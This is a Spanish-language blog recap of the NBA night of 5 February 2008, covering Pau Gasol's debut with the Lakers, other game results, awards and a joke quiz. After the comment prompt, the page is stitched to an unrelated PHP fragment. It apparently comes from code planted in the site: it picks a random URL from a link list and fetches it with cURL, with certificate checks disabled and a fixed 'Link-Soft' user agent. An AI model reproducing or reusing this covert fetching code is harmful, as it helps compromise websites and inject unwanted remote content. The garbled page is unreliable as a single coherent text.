La crónica (05/02/08)

06 de February de 2008 por MagicJohnson32

Ayer fue el Super Tuesday, el día clave en la carrera hacia la Casablanca que ha de definir los candidatos de los dos grandes partidos políticos estadounidenses. Pero el gran triunfador de la noche no fue Hillary Clinton, ni Barack Obama, ni John McCain. Ni siquiera Kwame Brown en su estreno con los Grizzlies… Fue Pau Gasol: debutó con los Lakers y llevó a su nuevo equipo a la victoria en New Jersey con una magnífica actuación que analizaremos durante el día de hoy con todo detalle.

kobepaunewjersey

Pero como no sólo jugó Gasol anoche, resumamos lo que deparó la madrugada en la NBA:

damonspurspacersLos Spurs se dieron un paseo en pista de los Pacers, un equipo en estado depresivo que suma 6 derrotas consecutivas y que ya está fuera de posiciones de Playoffs. Debutó Damon Stoudamire como espuela, fue titular y finalizó como uno de los siete jugadores de su equipo en anotar en dobles figuras liderados, por supuesto, por Tim Duncan. Los Pacers empezaron muy acertados en ataque pero en la segunda mitad se hundieron con un parcial 57-30 para el 116-89 final.

En Cleveland asistimos a un encuentro vibrante en el que Cavs y Celtics se olvidaron de las defensas durante buena parte del partido. LeBron hizo de todo y en mucha cantidad (33 puntos, 12 asistencias, 9 rebotes, 5 robos, 2 tapones y 7 pérdidas de balón) y esta vez contó con la colaboración suficiente de sus compañeros, con un gran Ilgauskas, un buen Hughes y un Gibson decisivo en el 113-114 final. Los Celticslebronrefreeceltics demostraron que necesitan a Garnett para rendir al 100% en el aspecto defensivo (y no permitir, como ayer, 17 rebotes ofensivos del rival). No tanto en el ofensivo, ya que Allen, Pierce, Rondo y House anotaron entre 14 y 24 puntos.

Los Sixers vivieron a la inversa la misma historia apenas 24 horas después de desperdiciar una renta de 20 puntos ante los Hawks. Esta vez, y con Mo Cheeks calzando un solo zapato por culpa de un ataque de gota, protagonizaron ellos la remontada ante los Wizards que mandaban por 12 puntos en el inicio del último cuarto y que a partir de ese momento fallaron 15 de sus últimos 20 lanzamientos y perdieron 7 balones para facilitar las cosas a los locales, que acabaron ganando 96-101. Tuvo que ver en ello la lesión de Caron Butler, que se resintió de las molestias que le obligaron a permanecer 3 partidos de baja y se retiró en el tercer cuarto. Antes de su lesión, Butler dirigía a los suyos con 9 asistencias. Por los Sixers, Iguodala anotó 20 puntos, Andre Miller repartió 14 asistencias y Thaddeus Young firmó un gran encuentro con 17 puntos, 8 de 10 en tiros, y 9 rebotes.paulakersnetsjefferson

Los Grizzlies vivieron su primer partido tras la marcha de Pau Gasol. Sin embargo la historia no fue muy diferente a la habitual esta temporada: Memphis cayó tras desperdiciar su renta en los últimos minutos, esta vez ante los Bucks de un acertadísimo Mo Williams, especialmente en el tramo final. Sin Redd ni Jianlian, Williams logró 32 puntos y 7 asistencias, y los habitualmente suplentes Villanueva y Charlie Bell firmaron 16 puntos (con 16 rebotes) y 17 puntos respectivamente. En los Grizzlies, Mike Miller hizo 32-5-3, Gay 21-5-6-4 y Milicic volvió a mostrarse sólido bajo los aros, pero no pudieron evitar que el marcador final fuese el 102-97 favorable a los Bucks.

Y en el partido del que más tarde hablaremos en detalle, los Lakers ampliaron a tres su racha de triunfos en la gira más larga de la historia de la franquicia en el partido que supuso el debut de Pau Gasol con los angelinos. El catalán salió de inicio, tal y como Phil Jackson ya había adelantado, y evidenció que el sistema del triángulo le va a la perfección. Gasol no sólo logró grandes números, 24 puntos con 10 de 15 en tiros, 12 rebotes, 4 asistencias en 35 minutos, sino que fue decisivo en el triunfo de Lakers 105-90 con 3 canastas casi consecutivas en el tramo final. Derek Fisher fue el máximo anotador con 28 puntos, Odom logró 14 y 15 rebotes, Radmanovic aportó 16 y Bryant se quedó, por primera vez en más de un año, por debajo de los 10 puntos, afectado en parte por una dislocación en el dedo durante el segundo cuarto. El mejor local fue Nachbar, con 19 puntos y 10 rebotes, mientras que Carter anotó 27 puntos.

Sigamos con los premios.

Nuestro MVP: los números de LeBron James no dejan mucho lugar a la discusión, y menos aún cuando su gran actuación se vio refrendada conthaddeusyoungwizards una victoria sobre los Celtics. 33 puntos, 12 asistencias, 9 rebotes, 5 robos y 2 tapones convierten a James en nuestro jugador más valioso de la pasada madrugada.

El rookie: Confirmado. Thaddeus Young puede ser un gran jugador de baloncesto. Esta noche, el jugador de tan solo 19 años, ha anotado 17 puntos con 8 de 10 en tiros y además ha recogido 9 rebotes. Gran noticia para los Sixers.

La sorpresa: Charlie Villanueva se ha pasado toda la temporada a la sombra de Yi Jianlian, entre rumores que dicen que le chino juega por contrato. Hoy el dominicano ha jugado de titular y ha anotado 16 puntos y capturado 16 rebotes. Otro que también ha tenido una actuación ejemplar es Derek Fisher, que, ante la mala jornada de Kobe de cara al aro, ha recogido su testigo y ha anotado 28 puntos.

La decepción: Momento histórico. Es posible que nunca más veamos a Kobe Bryant en esta sección, pero posiblemente nunca más le veamos quedarse en 6 puntos con 3 de 13 en tiros. Aun así, los Lakers fueron capaces de llevarse la victoria de New Jersey. Algo está cambiando.

Pasatiempos: ¿Qué significa “NOISE!”, la palabra de la pancarta que sostenía la mascota en la cancha de los Grizzlies?

grizznoiseA) “¡¡Oh, dios, Kwame Brown no!! ¿¿Qué hemos hecho para merecer esto… a parte de abuchear a Gasol??

B) “¡Chris Wallace dimisión!”

C) “¡Me aburro!”

D) “¡¿Qué demonios pinta un coyote en Memphis?!”

E) “¡Ruido!”

F) “Soy pobre, parado y tengo mujer y 7 hijos que alimentar ¡Dame argo!”

G) “¡¡Marc es el hermano bueno, Kupchak has picado!!”

Respuesta correcta: la E, pero ya tiene que ser un fenómeno la mascota de los Grizzlies para animar a los valientes con ganas de acudir a las gradas del FedEx Forum. El ganador se llevará una copia del estudio “1.000 cosas que hacer en Memphis más interesantes que ir a ver a los Grizzlies”, 999 de las cuales están relacionadas con eventos de frikis de Elvis (la otra es quedarse en casa viendo a Pau por la tele).

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>